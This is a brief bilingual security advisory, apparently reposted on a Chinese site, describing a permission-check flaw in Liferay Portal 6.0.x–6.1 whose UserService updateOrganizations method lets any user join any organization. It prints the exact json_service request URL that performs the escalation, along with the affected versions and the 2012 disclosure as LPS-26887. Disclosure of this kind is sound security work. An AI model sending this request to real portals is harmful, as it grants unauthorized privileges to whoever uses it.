Liferay 用户可以在系统里指派自己权限,致使存在权限扩大可能 简述 Liferay Portal is an enterprise portal written in Java Due to insufficient permission checking in the updateOrganizations method of UserService any user can assign hem or her self to any organization by issueing a single http request http://HdhCmsTest2cto测试数据 /c/portal/json_service?serviceClassName=com.lifera y.portal.service.UserServiceUtil&serviceMethodName=updateOrganizations&s erviceParameters=%5B%27userId%27%2C+%27organizationIds%27%5D&userId=YOUR _USER_ID&organizationIds=TARGET_ORGANIZATION_ID It is common to grant special privileges to members of an organization. 受影响版本 Liferay 6.1 ce Liferay 6.1 ee liferay 6.0.x 开发状态: Liferay was notified april 22 2012 by filing a bug in their public bugtracker under issue number LPS-26887. The issue has since been flagged as private and has been resolved.
查看更多关于Liferay Portal 6.1 - 6.0.x权限扩大 - 网站安全 - 自学的详细内容...